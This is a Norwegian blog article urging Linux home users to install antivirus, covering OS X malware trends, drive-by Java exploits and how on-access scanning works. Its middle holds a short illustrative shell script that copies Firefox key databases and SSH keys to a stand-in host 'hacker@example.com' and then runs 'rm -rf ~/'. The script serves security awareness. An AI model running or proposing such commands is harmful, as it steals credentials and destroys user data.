En vanlig oppfatning blant avanserte brukere (mange hjemmebrukere som har installert Linux selv faller inn i denne kategorien) er at «Linux kan ikke få virus» og «som en avansert bruker kan jeg overliste potensielle virus». Derfor er det ikke utbredt å installere et antivirusprogram på Linux. Denne holdningen bør revurderes: for sikkerhetens skyld.
Påstanden om at Linux er virusfritt og at man ikke trenger beskyttelse for det er populær, men det gjør den ikke mere sann. Apple har i mange år brukt en lignende påstand i markedsføringen sin. I løpet av våren i år byttet de ut reklameteksten «Macer får ikke PC virus» med «bygget for å være sikker.» I løpet av det siste året har markedet for antivirusprogrammer gått fra at ingen tilbød antivirus til OS X til at alle de store selskapene nå tilbyr det. Det har har oppstått et markedskappløp mot de mange virus som har sprettet opp på rekke og rad til plattformen.
Hva har egentlig endret seg slik at OS X ble et mål for ondsinnede programmer? Ikke annet enn markedsandelen til operativsystemet og dermed også hvor virusskaperene retter sitt fokus.
OS X er bygget på mye av det samme fundamentet og med den samme innebygde sikkerheten som beskytter Linux. Mange av brukernes oppfatting om at det er et uinntagelige slott er også dessverre den samme. Linux er like sikkert som OS X. Eller for å si det på en annen måte: Linux er like
usikkert som OS X.
I
trusseloversikten utgitt av
Norsk Senter for Informasjonssikring kan man stadig hente ut nye eksempler på angrepsvinkler som kan benyttes for å angripe Linux. Den nyeste trusselen som nevnes i oversikten er den mye medieomtalte
sårbarheten i Java som blant annet ble
funnet hos Teknisk Ukeblad. Denne trusselen lar kode kjøre på maskinen uten at brukeren er involvert. Alt brukeren trenger å gjøre er å besøke en nettside som inneholder denne trusselen for å bli infisert. Slike sårbarheter kan spre seg raskt via for eksempel et annonsenettverk eller etter etter en aggressiv overtagelse av en nettside brukeren besøker.
Om en angriper får muligheten til å kjøre en hvilken som helst kode på maskinen uten samtykke og med samme tillatelser som brukeren: hva kan skje? Linux og andre moderne operativsystemer skiller en vanlig bruker fra super-brukeren ‹root›. Som super-bruker kan man avinstallere programmer for alle brukere og gjøre store endringer på systemet. Som en vanlig bruker kan man likevel installere kjørbar programvare og kjøre skript.
En angriper med muligheten til å kjøre en hvilken som helst kode kan for eksempel kjøre dette nesten komplette angrepseksempelet:
!#/bin/env sh
# kopier over filer som inneholder passord og sertifikater til en angriper
scp ~/.mozilla/firefox/*/cert*.db hacker@example.com:stolen-passwords
scp ~/.mozilla/firefox/*/key*.db hacker@example.com:stolen-passwords
scp -r ~/.ssh/* hacker@example.com:stolen-passwords
# slett så mye som mulig av brukerens hjemmappe for å fjerne spor av
# og hemme brukerens muligheter til å stoppe angrepet underveis
rm -rf ~/
Ugang og økonomisk svinn som kan oppstå etter at noen andre har fått tak i bankens, Facebooks, Google Mails, eller arbeidsplassens passord kan være stor. Et økonomisk rettet angrep er kun så vellykket som angriperens mulighet og evne til å utnytte det finansielt. Eksempelet ville uansett vært en ubehagelig opplevelse for brukeren.
Et annet tenkt angrep kan legge til en systemoppgave som jevnlig blir kjørt uten at brukeren vet om det. Fra en slik posisjon på systemet kan ny kode hentes ned, og kontinuerlig informasjon om brukerens aktivitet kan sendes ut av systemet. Dette er trolig en større trussel for bedriftsspionasje enn for en hjemmebruker da økonomisk informasjon ofte vil ha ble stjålet med engang systemet ble tatt ut av brukerens kontroll.
Bare i løpet av en enkelt dag vil en bruker åpne utallige filer, være innom mange forskjellige nettsider, motta epost og direktemeldinger fra et utall kjente og ukjente parter.
Mye av denne aktiviteten er bygget på tillit. I nettleseren har brukeren tillit til sikkerhetsindikatorene. DeT grønne eller gule symbolområdet nært adresselinjen som indikerer at det er en sikker forbindelse fra brukeren til tjeneren på andre enden av tilkoblingen. Det betyr at ingen mellom kan snappe opp det som overføres mellom de to partene, men det gir ingen garantier for hvem det er brukeren egentlig kommuniserer med.
Når en bruker besøker nettbanken sin i en nettleser lastes det inn flere skript, bilder, stilark, og andre filer som tilsammen utgjør nettsiden. Nettlesere er ganske smarte beist som har sikkerhetsretningslinjer som er ment å forhindre tredjeparts ondsinnede skript fra å bli injisert på sider. Når disse retningslinjene blir forsøkt tøyet eller brutt kan nettleseren svare med å redusere sikkerhetsnivået på siden. En bruker vil til vanlig se dette ved at den gule eller grønne sikkerhetsindikatoren blir fjernet. Dette skjer stadig vekk rett og slett på grunn av overseelser fra utviklerne bak nettsiden uten at det er et forsøk på svindel eller en sikkerhetsrisiko. For brukeren kan det være ugreit å vite om det bare er en uskyldig feil som er begått eller forsøk på svindel.
Et antivirusvarsel når brukeren besøker en nettside er derimot mer alvorlig. Det betyr at en eller flere av filene som ble hentet inn når brukeren lastet inn siden til nettbanken inneholdt enten en tidligere gjenkjent eller en ny og lignende variant av en tidligere gjenkjent trussel. Selv om nettleseren eller antivirusselskapet kan ha hindret programkoden på nettsiden til å kjøre er det en tydelig indikasjon på at ikke alt er som det skal enten hos banken, på brukerens maskin, eller et sted i mellom.
Om dette skulle skje bør brukeren ta kontakt med banken for å varsle om forholdene og forhøre seg om hva de bør gjøre — eller bare vente noen dager med å gjøre bankbesøket. Uten antivirusprogrammet vil ikke brukeren ha fått noen indikasjon på at det var noe galt og risikerer å oppgi passord og kredittkortinformasjon til en tredjepart.
Dette er bare ett eksempel på hvor antivirus kan være nyttig. Det er ikke bare nettleseren og programtilleggene som kjører i den som er populære mål. Et ebrev som tilsynelatende kommer fra banken, PayPal, eller Facebook kan være sendt av noen andre. Om ebrevet inneholder lumskheter kan antivirusprogrammet hindre det fra å gjøre skade og et varsel når ebrev åpnes vil gjøre brukeren kritisk til avsenderen. Om ebrevet inneholder en lenke som peker til en nettside som er noe annet enn brukeren tror det er, kan antivirus være en lur venn i bakgrunnen om det skulle lure seg lumskheter på den ander siden av lenkeklikket.
Antivirus kontrollerer filer brukeren eller brukerens programmer har bedt om å åpne før brukeren eller programmet får tilgang til dem. Filene kontrolleres opp mot virusdefinisjonsfiler som lister opp kjente ondsinnede programmer, hvordan tidligere kjente ondsinnede programmer oppfører seg, og hvordan koden deres ser ut. Om filen som åpnes ikke finner et treff på listen får brukeren eller programmet tilgang til å åpne den. Dette kalles ved-tilgangbeskyttelse eller sanntidsbeskyttelse.
Antivirusprogrammer vil også forsøker med varierende hell å analysere hva et program prøver å oppnå og prøver å bedømme hvorvidt dette vil være skadelig for brukerens system. Om en fil blir flagget kan filen bli innsendt til selskapet for videre analyse, og tilgang til filen kan bli blokkert hvis mistanken om at den er ondsinnet er sterk nok.
Antivirusselskapene lager lister med definisjoner av nye virus og deres oppførsel, og oppdateringer av listene blir dyttet ut og installert. Det er disse listene mange antivirusselskaper tar en årlig abonnementsavgift for å gi brukeren tilgang til.
Det er på grunn av dette at det viktigste og vanligste sikkerhetsrådet er nettopp å alltid ha oppdatert programvare og operativsystem. Automatiske oppdateringer er mer brukt nå enn før, men bruker bør likevel innimellom kontrollere at ting på systemet blir holdt oppdatert.
Du kan aldri være helt sikker. Teknologien vi har i dag er ikke laget for å være sikker. Hadde operativsystemene våre vært helt uinntagelige slott så ville vi aldri ha brukt de. Det hadde vært for begrensende for hva vi selv hadde ønsket å gjøre til at det hadde vært nyttig for brukerne. I en usikker hverdag er det dumt å fremmedgjøre en så god partner som et antivirusprogram. Spesielt når det finnes helt kostnadsfrie alternativer.
Det vil komme en oppfølgingsartikkel om noen dager her på Linux1 med en gjennomgang av enkelte antivirustilbud hjemmebrukere har for Linux. Denne er nå tilgjengelig:
Antivirustilbudet for hjemmebrukere.
Linux har blitt brukt som et eksempel gjennom hele teksten, men de samme forholdene gjelder på andre operativsystemer også.